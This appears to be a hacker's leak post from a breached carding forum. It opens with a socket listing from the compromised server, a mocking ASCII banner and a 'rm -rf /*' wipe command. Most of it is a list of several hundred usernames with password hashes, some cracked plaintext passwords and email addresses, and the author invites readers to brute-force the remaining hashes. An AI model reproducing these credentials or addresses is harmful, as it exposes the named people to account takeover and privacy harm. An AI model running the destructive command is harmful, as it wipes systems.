sockets +Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr +ffffff02056d60f8 stream 0 0 0 ffffff000dc119b0 0 0 /tmp/mysql.sock +ffffff000dc119b0 stream 0 0 0 ffffff02056d60f8 0 0 +ffffff003f1ae9b0 stream 0 0 ffffff01c227e5e8 0 0 0 /tmp/mysql.sock +ffffff0045a535d0 dgram 0 0 0 ffffff0045a531f0 0 ffffff0036319aa8 +ffffff0036319aa8 dgram 0 0 0 ffffff0045a531f0 0 0 +ffffff0045a531f0 dgram 0 0 ffffff020543e5e8 0 ffffff0045a535d0 0 /var/run/logpriv +ffffff01670f89b0 dgram 0 0 ffffff020524d9d8 0 0 0 /var/run/log + + / +*//////{<>===[OBAI]==================================================- + \ + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| KRON0S: Seitdem Thanatos und ich hier das sagen haben , haben wir | +| sehr viel auf DDos protection und Sicherheit gesetzt . | +|____________________________________________________________________| + +~$ rm -rf /* + + / +*//////{<>===[PASSES]================================================- + \ + +Here we go. Some crazy combination of username:password:plain:mail. +I hope you guys dont mind if we did not crack all of them. Passwords +are stored as sha1($username.$pass). Feel free to bruteforce the rest. + +DEIM0S:97e36bdc7778264c9ca785b86beda24a277c4713::deimos@carders.cc +Nowo:bdda38c461e2bcaf54c8c0d0adf9b946::nowolix@hotmail.de +MoneyBoss:2dca6800fdf6ea230f48ba307b68e5bf::asdfg-1337@web.de +sPloiT:5f2c0db92c5c716a2e4e4e55bca6b995::cadazadmin@gmail.com +Moq:da2384e118f6d9aca8c0d832fdf28c90c4218c8a:fenerbahce::Mehmet-43-@hotmail.de +cyberhood:29b0b59fd185b3b4a7072fb374e282e19cdc3361::soh.cyberhood@googlemail.com +Napushenko:2f75c234d331a8687e64a9eb975efc09::kretenovich@hotmail.com +Sauberfee:60b7c1ba7f2752b67a5177a8a9e9623043d70107:cracking::Cyr4xxx@hotmail.de +Hamtaro:a8a2befbf9d1b91473737ef0ac9f86e9219763d0::foolish2do@web.de +takedown:9d1f189133a91fb63b7c58ffedb49584::takedown@hotmail.de +TheMyd:14d9e4d2cf0e752594ccc67c1d32e052::allonemail@gmail.com +Slayjim:665711fbd4a62815f67b03f213522262::Hitcher99@gmail.com +bumbum130:e79f872373472b182a35d792a15ce537::bumbum130@mail.ru +dendo:e250017e718b4367ded5e978df0d8781::dendo@twinmail.de +Daemonicon:40c22c31c65f2d754c4aa11bd2bdb2396dc26d77::2155151@web.de +andree4000:57ca3487bf20011c41e560099c155831e794c4c8:nemesis::mastercard@xemail.de +Chunky1337:43f6d82d67c98e9efdd86979c657c54f::PWNH3X0R@web.de +Monarchie:3180ea52fa76acac65269db21770af23::rootytheroot@googlemail.com +MoNoPoL:eceaf25bea972ef7a090bdcc19536ac6::gh0XX3@web.de +nasuper:3978bcb3463c0478604a6201d92b9f62::mambamamba@mambamamba.tc +RealGun:3f902c447596efd10f3505b51eac2a17::matr1k@yahoo.com +b1ck:2c1260e7897097fd3e1d696e5c305b5f1a122792:4547F5::bick@darkthunder-wow.net +mastermaefju:d6fab5cd208b2d6eb542cb95ecd78a3b::mastermaefju@googlemail.com +User:b4c7faed12b35efa122bdb8d58dc28f2::Blu3sky@gmx.de +HaXX0rX:9589e744c9d8c731a2db41a256b05c5c01fe19bb:Aguilera::crazycold@gmx.net +HP PAVILLON:203fb3ccd37fd1ff18a9b5bc9b773eca::tugis@live.de +saxxe:e4fcda90fb34500a344e79e4126da35f71600f12::j.bonez@web.de +xStream:02badbd21c0442fc8695f184ca5d12748f84f954:717711::rofl_1988@web.de +Sesame street:a9218b9963da18da7ff925a72d96add1::insomnia7878@yahoo.com +quinola:9f5dc754f20b1a02215421722b577252::ohara_02@yahoo.com +Epiphone:fca6bff4e07053eeac7046a5539af9b8::13epiphone37@googlemail.com +xsus:d303ea5ba90e2fdcc6bb69aae3965543::monika_@dir.bg +maxhk:ed45f7f9cf16c108e2e1eba94030748edf7d1d4a::mivitich@yandex.ru +M1k3:145bdb8acaffe2ddf0922d3671172220::warriorsoffame@yahoo.de +noefx:9b3396addb723b40734171251208c760::an0n1m0101@yahoo.com +socal69:efa33d9a11fa7a89da867d0ca9076e5a::socaldv8@gmail.com +cactus:68513eede40f4b97b72a618c06a410ace1baaad7:hallo123::cactus918955@spambog.com +Neurosis404:2a35398d516bb0fb39ca11f5a3474c9d::neurosis404@gmail.com +Deon:84ae4db3e5194d9a22f90da7f7e3493221d8d1e8:viper::botkill@gmx.de +cooli:f10c2bf19234b052617cd81370427e94::gangsta@aaadd.com +smoke_weed:70502494f8920256ebbf705e726ea6ad9887e377:apfelsaft::aids116@spambog.com +ShiT:9a994131377a0bfd6c506fac55fcf0a0::poppelhans@gmail.com +Dimo4ka14:ba166531c5053512af2b70f4e5e5895a::Dimo4ka14@ya.ru +vaxx:67f3c7c352868df0e1fa75235b9751eb::adsdasdasd@aol.com +Cesa_22:f215680eaa7f6d6cf66e246f605fdef9::badtorak@gmx.ch +By Stres:3448d566661831fbb87558587d0017b4::stres@biyosecurity.com +TheApple:8ce9b853e8b10b0c9962734b1e3c1deb::apfel007@hush.ai +Chubaka:3f6e700ea8757769a05258318a1deece::info@soldiarz.de +Everglades:53badc18585fa287b210beb2038dc340::gfboster@gmail.com +gewinner:e84c39d348de786c823675dda7daab63::gewinner@007.ru +Ic3Drag0n:45d6ec13016bbf59c77e1737d6bed909::Saint90@hotmail.de +haiphongpolime:adc07270a9dc551282a4617c6fb72a4d::kerrybarness@gmail.com +telepat:150613b8eb0710a2adb8b3c33622165c::killah777@yandex.ru +HolyDarkness:f5a602d0d9300e18197a1fdd1ad49507::hodark@Safe-mail.net +zZzZzZzZzZ:d5c84c7f046f103d98b3a769d433fd72::wickedboy2007@gmail.com +house727:203488391fa5af323a408beba858a5cc::closer727@gmail.com +god-son:a84142494a9340afd735f2487401918b::zanucamig@yahoo.com +Kurokaze:17bef81eb5a39113a2743abb4eeebe0e::baron.de.cash@googlemail.com +slic3menic3:1ba2cf5cc41ef9701cfbff21c7f6145c::13hero37@web.de +N.A.S.A.:eb2f0229da724ee600012a047f7ab725cc81b51b:fuckface::x1x8x2@yahoo.de +Flex:6a1e9faf60f1a7dfd0230f1715e44a93::maxim_16@hotmail.de +*HIV*:6563883a558daa7a76f51e84ffc5a706::hivhiv@hushmail.com +FreakOut:9df6b1e3a642b8b95d9641bcf2add90a::t.koritkowski@web.de +4Freedom:321d0134947848a1afc6f3f79b4936dc::lucky.024@gmail.com +Final x-2:e46a6472c9d208893242715ae8062ce6082db953::FinalX2@web.de +secreTSline:2ad9ce7b3d92280553616578bd3d8df4::secretsline@mail.ru +My0wn:34efb4818c564b5b933b1b414441450f::dennis_rieger@web.de +CeeK:c990575a993cee991498aad711a0ef5a::gyros@spambog.com +Spitfir3:14bb037e1205338e4487f7c5f9e473dd24a46570:0123456:uweuckel@yahoo.de +next:d7f798cf492aab7b0598260049d3928f087c4118::luxbanking@secure-mail.biz +SLIM_OVER:d8fbf1ae7feb2faf666a540b14eab68f::nmfruit@aol.de +Noryn:2158ffa090889ef7d2f446445eb4382a::Peach_Roxas@live.de +BlackPhone:18f208216f21df6f06c382c83844c42150086014:48854885:alexhaff92@aol.com +remaino:b7baf3185df423e7338672471187e4bd::vfdh45@trash-mail.com +h4ppyh0ur:6ef7005c20b092ccb1e6cade492848489c1f1e81:mutter12:cr0sh0r@gmail.com +trfs:ad117809c74fbe98c73835aad1f56673f54be2b2::nalukas@gmail.com +illu444:8243603cd45bfe127a9629e0602e9221cc847593:CD5455:Lipsy@gmx.de +2Pac:4deae3003de808ace0df05982689a576::gesch0@hotmail.com +M1ntox:beaf32fe871013357d466509e64d9b93::M1ntox@trash2009.com +slash:4bffc32173f7156b4c2e19eb527eb310560c29b1::diestriker@googlemail.com +Deagon:5fafe13f1c0c4baf6ba54dd6a4ce893d::deagon009@hushmail.com +majed_19845:d7c42fefb1cc79bdd7f3ee999f4126fb::majed_19845@yahoo.com +jjgoesrage:8bc2db02cb8afe20badd8584b8d219e99cfdacc1::vaughnQQ@web.de +taironbc:8dcd1420de1fbbeddc353bdb243539f65955a79f:13371337:taironbc@yahoo.de +Slevin Kelevra:75b1d13250eb869fa8f2883fcc025d8dba8fd98f::heavybangl@web.de +sebdon:2bd90c67b5dbbe80d1025a3dd83cffdc::cartman456@web.de +Wolf.TW:0c6a2d2e4bba59944d8788304dcf07ea::mind.st3aler@gmail.com +vendetta:8e3231292d5d69f5cc576723fc79c158::styler.-.emre@hotmail.de +lutens:0ac17305a5bb8e3709241d08843719ba::insulatedglass@gmail.com +thesilence:f851d34ccfe6f72f427d2dc4c7bfdb992e9f94a7:hallo123:thesilence3444@gmail.com +Psycho2211:64858cbe0971cfc46bd88338a8120161::psycho2211@googlemail.com +kasimir:a669a809513169b54c08adcb67529606::sophia@e-mail.tl +xxx:a4bb971ca3276c5c58f3f00753275222::cardezz@yahoo.de +afzal12:b97b0a885bf75266edaba2720eca9fdf3254ba23::afzalahme@gmail.com +Rolf666:b89da2c7f5107dbdca2c8e1ad6c6b84e::gerald-koschniwo@mail.ru +DjToKa:e43a6ab85a6bb7a260b9bf6e25804065::djtoka809@hotmail.com +Jubeea:2ce53eb05170c8ee4398b1129cf4af5f::drewfox_dixon@hushmail.com +WeedMaster:a57bd65c3f42e5a75b0faf863ae0feae::Krankkebeatz1@web.de +wampir:dc97131c8f54ba845eea1887e7dc9623::lewakok@hotmail.com +MR.RU:4bd3c390b67509ce9280b1c8da04ce540710bfad:killer321:ccaammss@web.de +Der User:2071b2a84c1adfddcc4241da5eb4439819eb5dd2::0x0001337@gmail.com +Vini:9d2e1efa4304231e017190d18ac4535b::kevin-vini@web.de +DjLee:fe4ef35f394c9dbee8e88fde3a329851::sven.wiggering@gmx.de +cheatkiller:3f42cbeab1606a7b0104df4216059fd8::pauli.886@googlemail.com +boomy:ff5a041e0e3fe5a648da07209a91e7b9::boomy1@live.de +Zauberberg:db1354dd7fe2de4e6b60f1a82d22c6f4::matzu93@hotmail.de +GANGBANG:142c49c49633a8fd086998066c32005d::aju_butt@hotmail.de +Numb3rs:816ea060b1a841048df81e5b105faefaa9e3e394::aom_1177@web.de +James:e944f3b7096e3b126faf6228a9b5a692::jammil1@web.de +yakisikli123:31a4119bea9b750cbdd871d5dce9547efaeb5290:mafia1234:yakisikliyeni1@web.de +Lampukistan:40ae0f64e84c739967fcc99bd50c6570::samydeluxe@gmail.com +Conflict:7c721285907aae8683e4bdb8aeff76281a5e98ef::conflict@fromru.com +JonnyP:e9d5ae05e1db9353ab4fcf0500ae5d19::jonnyplau@yahoo.de +Stunt_Man_Mike:56c76cc7ca4109ddd8787b449cbe93bf::boringmail@trash-mail.com +UserID1:2581b127760aa2c66c5e04650d8eded1::userid1@mail.ru +pewpew:25ebf6d96a281ed0014a6427605f84d9::lithtrader2@gmail.com +NicNac:8a08f82ba334408bcb946ce705f00f80::fdluzinski@arcor.de +LocaLlHorsT:234b2e16576eafdda653a17f514358f378d2b1c1:bilimaus:robert94@live.de +Blacee:2015fe93c7e33b6ab46eeec4bcefac0d::maxmuster9@hotmail.de +saveacc:044a3afb0a0cef4c2ec4d63cf4a184b69b75c4b2:asdasdasd:saveacc@hotmail.de +Outlaw158:c672a556d1dd6da82bede8295ddee0979d2c6471:halloween:jack15999@googlemail.com +paypalcvv.com:0af948fee11b0f32ea2bc0346b716a4e::emmq88@gmail.com +Intel.:1c5e508196e43ee8049f378b1fc90bda::intel-2000@web.de +ArmageDDon:4361082458daf1bf249bc2caa43968c9::armageddon@d4mn.net +DaFa:92ff67eb5d8a6d3921bab9b91547b994::mdk_usa@usa.com +ELEKTRO:f16f6823b8d3c52e89098b470cce4dff::Crime@mail.3dl.am +kartoffelbrot:382903ff2858ff61b0611996f38d2af2b21a0a65::kartoffelbrot@inbox.ru +Seller80:8657f686060c3005f0884828630a243d0a6cdc83::Bankaccount@mail.3dl.am +Hans Peter:b90588fb3787fcfb60a80b51269177c85f9c7bfa:ikillall:hanspeter@secure-mail.biz +cheatfreak:a5ff495b7e791440888f771af68dba4a::cheatfreakasdf@web.de +Luna1nc:7d3e51f5c05cdf004d0a4306b7e63f723e22b64d:online123:schdeutsch@gmail.com +Cardleader:e1be72d5ab848d85d9d5ba5098343ca8::multiracer@ymail.com +zzagalo:33f6d6c887200c52f86c219e3d438332::zzagalo@yahoo.com +brutal14u:494fb63c0faa0769b714381993ec1a3cb2e2b396:testerisback:brutal14u@mail.ru +ALCHIMIST:c5e8924f05d53cf0c7a42dd3b2ebbfad292934e6:ikarus88:alchimist@hushmail.com +knowledge:9aa75d739c93a15373c53b8c0a16e7b5::memberplex2006@yahoo.com +BanJoo:8de557db53ce0166acbfad0eae3c43261d455817::deluxe@hush.ai +Shorter:7392c221b4a70a9433598fc25e08814c::Shorter@trash2009.com +GreenLantern:8b6e794e8f68a07009a3915c714ab3e2::attack_warrior@yahoo.de +n9x:77221c82c7e5203d74665682431064e0::n9x@kuh.mu +cens0red:79bf3803657cec588726492f97b17ba3::c3890521@tyldd.com +RedBull:b448c71ca90dac3e55b8fda8e51c9f63::2313321132@spambog.com +Goldfisch:422f62a1ae21b9af00b701fd670150120d57f910:andra1992:Goldfisch1989@web.de +RAzoR261:fa81400d3895caf6e77082128599e076::jabba88@twinmail.de +Saw27:b82c91ec6f5430830c013ccc3d5d2e7b::saw27@hotmail.de +Cerberus:61a436041006bd160542166f79baac8fdad801b1::trash@trashmailtrashtrashtrash.com +Hit7:d9f280b62d1d87951a6610f7128c40b45f639110:kev0o123:hitseven@hotmail.de +psychosomasis:3519459b497e22b8ab2c78ccbf0c5b71adde20f6::psychosomasis@yahoo.de +.m4xi:3196e764a80c3a338f7f6fb045fce46b::m4xi@mail.3dl.am +C00ki3:426c89219eb5c9cc3d14da8bda7c0d6d::knacki2008@gmx.de +w00dka1337:702d31d04009234bfc17c6e260d3310c0840013a::hallo.39@hotmail.de +Kaktusknecht:a4b7ce2a533707d2222ad6b273c14d2b::c3955121@tyldd.com +Invisible_K:3257c65bed58e5d1d3bb1b627aa32925::street_life93@yahoo.com +hfc1875:dc516bf6fb99f3dc701cb85efc6b8d6f::murr76@live.co.uk +Killerzone:c84e8f624178df668ffa41bc9cc9254c::oliver.grefe@gmx.de +Kuku:33842327f3f12465df2ae19794a601a9dc35267d::misterkuku@googlemail.com +muruk2009:703982ef9296ca19dcd350a0c03f8c9db0b7b25e:123456:muruk2009@live.de +kdkdkd:4daaa3339d58894cf73b8886d1f7cc7c429340e4:abcabc:kandel67@googlemail.com +Koka:cb92cb5a079e695771e9fe362ff8eee6::dange86@freenet.de +jokajoka:5f3fd38d6094dbc01d2d06695dd43f50::leolange@hotmail.de +puppe:be2a05c7fa190255fa8cd92ee77cbe36::raphael-oliver@web.de +Stonekeeper:06678e1ee551b72fc2bec1593ea9b05f::nonameknow@hotmail.com +soldier16:2ac148ec0f0d8c29b33d94eee8b1fef3b96bce0b:vivian:musekeule@yahoo.de +Tropper:6d083ddf436f103d6c155275fd9a69b6::agggroberliner222@web.de +Raiden:65913a02f5c3a5437ca19c9a3467a851aeb04f5d::analegrande@netcologne.de +willy:da99d913238ef9a3a2077f1690229a9c::willywll27@gmail.com +TwixXx:63fae666f53990b611ae73c4f1562328::yacine.aouchari@googlemail.com +sainttropez123:08d0791c3421cfdf7e51526874f6477aca820ee4::sainttropez123@gmail.com +towel:386cefcd2bb6b9774143cf7f4f24fabb::towelnet@yahoo.com +medius:60566a2407309924111b83a8f1bc16e9::sasaikai@guerrillamailblock.com +GiGa:df978ae0cd5e6c1899f641113bf99c4c::gigatonen@mail.ru +aggroberlin132:3fe61799b7ca1065cec4bbca119d8007::canmar@gmx.de +Bierfass:365e660885df4be3652f30592d4141ac54f879db::johanna_1980@web.de +Dvl:2c446ac749270734e451f4aea3b53f4f::dvi1337@googlemail.com +Southpark:0aaa4e18569acfb21d0b9b3a2bea5172a6d983b2:eeeeeeeee:axelkiosk@hotmail.de +Crunshy:7d31549cda9063e338eb382b6b8a9790::j.bohn1995@gmail.com +Hackbook:2e42254b725a779e05911f7e43ac69a6::matking@gmx.net +GhettoLive:9d7578760011ec8d77b8894a4c6aa24975b05255:a1234567:ghettoboy@safe-mail.net +Werk12:21dff2630647f870234da0b0e64e756d7f87d872:123abc456:werk12@mail.ru +Black:White::013085c99bac57a57cbb5cc1241a3970 +CCowner:de112f158bc2a535b8daaef598a33cd78b5b3176:1231231231:hanshelmuth70@googlemail.com +instore:c76ec8af1beab966a667eb95aa8b5455::porn.star.thai@gmail.com +berg2010:bbf1a484c4dc3b902bef0b5c56bb847c::berg2010@gmx.de +hien_hack:cdeaec7cc7aee73493513f7288ba2e66::hien_hack@yahoo.com +cikatyla:9898f6cf19e9fd48b182972db7161344::cikatyla@googlemail.com +White.Black:39abd9dbfb81dac8e3e85b010e520d4b::korinna.griesing@web.de +bl0b:e4c577439e71ff3b3a126244f44357ce5981c5ec::bl0b@bk.ru +larry_lll:1c77a4874e55e306762c0e1f73e7e38a::larry_lll@yahoo.com +viet@ddp:86c60b7fb6a6daeb7d19abb835fa4873::ibam188@yahoo.com +skimz:fca44906d023052b084e308ca8ae62bc::bluedemocrat100@gmail.com +CCCPMikke:7679bfafa28a058133355ffdc57e5cae::milbonahanser@yahoo.de +x1337:f2439099b0d99755a215c83ed7b768f161d1c9cc::liveyourstyle@web.de +TheBankManager:71c06b661e4f29a6bdc1d7480df24480::Mr.DENEFFE@gmail.com +m1nd:19c5d94af129bc0cee2c08dcd37896464e1b8fa6:11000035:maxpayne2000@gmail.com +Verbal Kint:01ea214ede0648160f6566722b97d2ae::ccctwjccctwj@yahoo.com +Hirntot:65f6268ab4698ca05a297731b3aaebfe::Tom-Fuchs90@gmx.de +Jok3r116:a4754242c9745106e9947d7879542a46a8007478:658292:Jos3m2@ymail.com +BinbogA:84ad7b7d9b826ca03d89b5bee154bde7::zwerg11@hotmail.com +S3t4p.3x3:a3daae40e44da14dd21ed06b76a3367a::c4291279@tyldd.com +Sullysefil:63d1bc7b920ead75591efd96dbb46ea6::sully_sefil03@web.de +angeldust:927314bc132b4115c0e0a509ccda97e079e9e6e8:szczecin:boomerang123@web.de +skimmbeam:c80e46fd272ed90e8baa720cb275326062b1562b::AndreasFuchs111@googlemail.com +dOncRiMe:6e0869b233100aa250c5fab4a128ec4b::vitamin_f@hotmail.de +roxxout:8f88ac8d288da6dc46eb007caf53bcbe::nt_selingkuh@yahoo.com +101binlist:2da4e5d7ef8e63002c1fe1b81816497ae79d3f99:creative1:nuffshotta@me.com +montione:6655b0a85f022247660415f52f30f12156813acc:vinmaster:vinmaster@web.de +toxiiC.:94f872038e4fa1f34adb10df5f07e2a9::dennis@xemail.de +terminiert:8daf2eaac9c5ccc79282ac8da4f0a3502e9142f6:hanshans:hans.olaf1@web.de +pokus:18d040a5c16bd90f6353851e0a10eada::luziferserbe@googlemail.com +VirtualRAin:5c11bd2fd2d81cf1250c35db811971e1::virtualrains@gmail.com +JickSaw:93ef0b780d4254e2da0add8cae7a67552624602b::jicksaw@mail.3dl.am +slyzer:4e7a2f9746614c13053e5cd85bf2d8c6b4e83621:ogame123:tadeotentakel@web.de +dzd88:0fb2b7aca49533ea84f749d427215cef0dcdc456:6567807:dzd8805@hotmail.com +Bilal47:7cffedb82341ac6b02e3bf2e0a65cd58::Bilal47@hotmail.de +C.Hat:7c6fedf8f223c4a42b1436a659e60a8a::c.hat@geomix.at +12345A:8c8b54b403d1a87dc685f7ffe96ce28b::apkq@sogetthis.com +codeblack:5c343445f09b7a1615cfc5ad1c965f3b::nciminet@gmx.de +Basquash!:36b49806b8f99fa4dcc5e967a79e1e1d473c07f1::faki23@mail.ru +alphabear:e63dcc98f19bbd66656e544e547103c84150476e:ficken1234:zajawong-reg@yahoo.de +Razade:88aeba784f3a43c351bd1ab5da7f2b6354f3d98c::mada1-mueller@web.de +nightman:4e6f9f92890aa60842107954a9e49ff5f7971814:ichwillauch:okioki1@web.de +Eldowow:cedb2e70191182d78e37bc8ce7b68e92739c85ac:hendrik88:ziohuso@web.de +cubo:ae8d2c75379f92149d9acb735e24923c::woldemar_loginow@web.de +VexXxeR:5f17f0f069e35e99f677ee7f47ea3a9a::guennesbruders@web.de +Goofy91:4244a2e8f95b1a2396010c1a6df506f4f49b6cc3::goofy@spambog.com +lioniuks:e1ecee9922e30698bfed050602cb5d2f::winniepooh1234@gmail.com +p5800:06b4b8c9356fb485d51fe8c18866056c16fe3159::p5800@crackbitch.de +mopedfahrer:16a09bae913adc4f560c1786d6b5977d79a0cfde::david60677@arcor.de +Jaksa:5256eaaacfe7655fe55b089bbd5485a9ccbe3f43::jaksa@pochta.ru +bk201:211ff87f3a9d1750413f224bbbad45fd::noemailyet992399@yahoo.de +don ed:153e272c13895dd9b418291ae9e597cc::asdf@web.de +hacker_seller:8e5c6081923efcada7a566346c4ab715::heatherstoneking@live.com +mastercrewster:ed0ee9a1ba057f066894ea4e6b38768ce2047357::castermaster57@googlemail.com +T3rm1:efcdf0394822541cf271b0acf825d326::t3rm1@t-online.de +Tobi30000:822faef40578e043a4a108644ef05483::30000tobi@gmail.com +clickandbuy:98691231801ddedad56dd598991c53a7::stefanie.ditzell@gmail.com +longtimenosee:7c4099a3b13ea7343fc7ec31cfb5cc93::echako202@yahoo.com +bykof:eff6893730973f0f0dccdbd2fdc54f00::bykof@live.de +htn:233f399515dcf3892a5ba0e6b9fdb0e4::z_istal@hotmail.de +passionnight:412ecbba7f017d3955d0641e33007f2d44fe1761:warcraft90:serbennymiles@web.de +Xax0r:4055092736a64369356002a08476feec::bbust@mail.ru +Image:029ff23213b11c728537f859ef048607::meyer.hans80@yahoo.de +Salax:5303643aeb3c8053a2c1b8d7f0c3c1f2da6467e9::Salax@gmx.net +blackbot:0ea7db0fd9cc0149af35536bc42ce18c9dd261eb::Frahmi12@Googlemail.com +softis:69a15c5a12403266ce187ed1ed95337d7c2bccb0::codiovan@hush.com +vicser:5832ee463939a605667aa46aa8b89fc6::vics@er.de +eikof:db1ad3fbb883183030098fb6a851ea94b57c9d72:bauservice:friedrichs.tim@googlemail.com +makko:6685a7349542dcd42e27f52ec8db4d3b7c25b16b::makko5@web.de +troubleinaz:387aae4afbf68456ded88e9f74bd5aae228be254::causintroubleinaz@yahoo.com +PhR34kZ:1208ee8ab5913275b3f75aebdaf490e6872d36d7::magicssman@web.de +battal:36388d3bdee603b3089006f5de574241::arminitus@hotmail.de +T0x1cBaSs:ec80bd5ecf0219153945a78516e83f89::stevenbass@gmx.net +letsego:0542dd3592724b861517b9da38e8fa76::horstmann.wietze@freenet.de +Toy:f80496108f969112f6468da3146e8c72::Toy5168@gmail.com +Dreamcore:a2be4b001dab8a7b58714c880710dfc7::wuzap@hush.com +illcorp:fbaf4a42204bc226bcc1e53ae8dc6f87::illcorp@mail.ru +klex:deed0a15d222a27451f8d7cb2392bc67c2b30ddc:lol123:a.kon0542@web.de +LON[G]DON:91fd8baa1775cbc7ed856b2733551b0d::serdar_ayhan@hotmail.de +Adrenalin:967cc271c2e74a367824ed4ec9957ae500f160b2:lumpi89:i-a-t-m-o-r@web.de +ice69:8c77218c858e848867123098f33041b9::arehartlovesgod@yahoo.com +spiderman:d81257a2dd7e6246bf8ec9bd348114df::bnalmyes@yahoo.com +pwned:c4c670f14a5daa111e3638f0d227de2d861eefa9::D3LuXe_x3@Hotmail.de +dbdn:f8da5bcae0cf5c1f898e2c9c1d85bf69::visasecure@yahoo.com +larifka:5f6c736afed714a6baf84561e98865ba060cfba9::larifka@googlemail.com +Metalheart:73f5416cabe88c2b37a3b3214dbf0c3f::metalheart@warez.tc +DoeJoe:ff8f2fc739473612762e977f0cb5ee7ef37a5ec4:bonzai:carderdumps007@yahoo.com +mR.bUGSY:908b893722364ddd0e68224b4927efc5::t0mmy.gun@arcor.de +ChrisXPS:e32b3bc619f2ed59d8219ed36bbe3f8eff3a6f69::tombraidergaming@googlemail.com +e-green:9c47bd5c9971f591518b766246c810217c159b0f:herbert123:electronic_green@gmx.de +babylon:5ebd895689134371f93d9506fe76b48b::babylon@hush.ai +Tracker:deab68070182fe3dc06862ba54246604::yuri1958@msn.com +canttouchme:ca9e5b14b9431669ba54f39cba9df26c::fasd@dfsad.de +|_33D:cfc55a370c6830bc5e88f6e43a8e1057::dj-jp_@hotmail.de +KenZoo:26dda5042f934a63f60a516afadbc8724be80a64:abcd1234:kenzoo@sandelf.de +SpiriT:fb39ec17c6eae98d4004600fc622bc89::a1607768@uggsrock.com +r00t_cr4cK:e7e8b0ba416c4e8d1c3144d5ea429924::ghost1288@gmail.com +firemoder:00f78c43a12ae4ca00bde14d8da5e46debf06330::firemoder@mail.ru +zzzzci:4e32eb4a8ec258b1d9afd10f48a96c82::zzzzci@yahoo.com +HustlaR:c2deca11533a4dd26af3fca54fdf6d890737afe8::antonio_steinhoff@web.de +malzbier64:4ea9223a2b633bf64c1499170809de83::malzbier64@kuh.mu +`sIn:b0be268735737e3c9ba9629b16ce98fb::m0dder@live.com +bingo:fdb0a7bb5a74d0d4fb7edfc9ed8cd2a7::bingo@ice.co.cr +TeCo:e7ab3ac70464ef50b095a129fb5bdae9::teco@packstore.cc +FakeBaba:2501b182e05ea200a17fb20cec871bc8d43524bd::live-fussball@web.de +Janus:5da4f9d012d057931701dcc7b7849a5c::fairmovie@web.de +haspen75:9d855446907f8b557d3437fe3c74616c::bills4030@yahoo.com +hax0r:a0ee0badb7ec97e2e8e96834da6639282f6181b0:alfred01:bfh_T.s@hotmail.de +Alpha21:ec2553658bd99731d90a5faea0bb36eea96792a4::xxx3xxx@hush.com +Absinth:8ced72e53d1cfbdb7264321629065935::dofek-olaf@Safe-mail.net +polk76:21a69da26d3d905c3a3e73a26d930f18::polk76@mail.ru +phishly:9efc714e456b67fbc5f7cb62471ee5f426f14dca:gundach:dynamitedlx@1337-crew.to +teetuete:6e25b1ce3538350a7516b5c87ec76be1510c5b92::xxiraki2@web.de +y0itst0:6e3ca058ca6775e655624eecb91806aa::artsiee09@gmail.com +NiKiTa:36bbb78a1e034fc7687d5934f321e5e8::nikita8720@gmail.com +Batman:245771f5a7751ec64e5db5c9a996a877782099d3::a_montana@hotmail.de +Iceburg:24665e5607db923dff4e1e7692d9f1ba::torturetilldeath@hotmail.com +IceBreak:9a1d90246f5d586e647bf31fe1fcc9d8::mr.love.hh@live.de +kwp2000plus:96700f45ad20947ec2b2bdc34daeee9e::malsehen@live.de +nayely:c29dcd958eedde20554880d556103953ca21a156::deivy_joel@hotmail.com +immunodeficien:59788ee76b2ba219f28be8dcb4ab4023::b61b057464@yahoo.com +iLyRiiCz:985a9cc2c6bae50cb608ae270e7d2e09::frank.hessler85@gmx.de +Sean^2K:4f4c1a1322cb37ff232bef1c6bb2f543::dark-taita1@web.de +paafsd:1b75d8c6a41d5dc699b87b535041733a::ranajames@hotmail.com +The Unknown:c08e9af39ebab766bd485ed4f054b287::the-unknown@Safe-mail.net +rs4honda:f2ff24fa804aab0e9acd7626def67210::rs4honda@yahoo.com +snipes336:4b1dccf2000de11786bc6818725f474c::bad_news_hamburg@live.de +Sh4d0w:e80b6e86b320a41630751b23d9c3e202::bla@blubb.de +iuse:8e8b71762073e375297a3a0d3fe35c24::iuse@live.de +Beekay:7688f60d292afe475754fc454e7a23cc::tagkaiss@windowslive.com +Marc09/10:3fbd483aa200e467f34ea4e1a494960f::warrockaccdaten@web.de +smokingteddy:8b3e95d39393887e3c24eaa99ce7f661::smokingteddy@hotmail.de +xzerox:c998a9574d0f978115a14ca300f4f37261aabb8c:knuddels:questme@web.de +Oggy:7096f0ca45fa996655d79d9a9b287e52::oggy@hush.com +Captainjack:714cdf0acca414aff98f692afd5ceb18::dreistuff@aol.de +13Skylla37:797aa9e329bf18e213ded2045b5823f170fe4594::Skylla1337@live.de +Injecti0n:e695348ff3390b7ac08a0dbc0a95d26b::hu3ss3@hotmail.de +Siwu:fa7e40970920fec0ee954c1df82e5f6f2aa6a06b:simon1990:simon.weiss@rocketmail.com +valentino:d99c2e24e9ad3d9d943551aa4cbf533e9d6b0caa:vermilion:attax.owns@gmail.com +Orifice:f015bbf6b4b517b2198d9c2f2d86c91123ffc98b::Backorifice@ymail.com +verik:f14a6f3c7efce934620dbd729c694bde::verik123@yahoo.com +warkid:83271baa982ac465d4f775c49a2a0a9d4eee3119::warkid932@gmail.com +Cornelsen:b0e654b8305c34278401eff7f85aab86d04926c7::cornelsen@trash-mail.com +Quik_Silver:d89eb0910d9a504c6136e6a2bdd06a0a::dasfdfdafadf@trash-mail.com +PitBuLL13:35640c9310a397d7f5d0c5681ee06997::Tr0p1xx@live.de +herzlungeniere:17ef5c4a82c3e08f3d467919b1674f785ae5f86c:kacken24:kalezz@web.de +aeiko:c49f8c65a152a4f6b502a1968a19a660::aeikooo@gmail.com +toni555:a3c51323ce293d6e17fa723ff5361d39::xherkulesx@hotmail.com +nworb44:0ba3a7972b0e90e89531d089bfaca46a::nworb44@inbox.lv +Arghs:9623b6f9ac32d634ab9bd029788558a3::fastsupportticket@gmail.com +Fruit:d48e1b817eefaa3cb72afbb7efc126ef::bunks.102@hotmail.com +Blackmamba:762b59b552ef210ce20f75767a6d32d6::Blackmamba@secure-mail.biz +n4k0r:455919ac252452a3d390f68646f9bdc9::n4k0r@mail.ru +superlol:18c28d479d09389aa9c5735668c6a68fe6233f60:timpfaff:alfredquak30@yahoo.de +grek:99789e3d0c90498b7e6ffb842cd5d576::a1580053@uggsrock.com 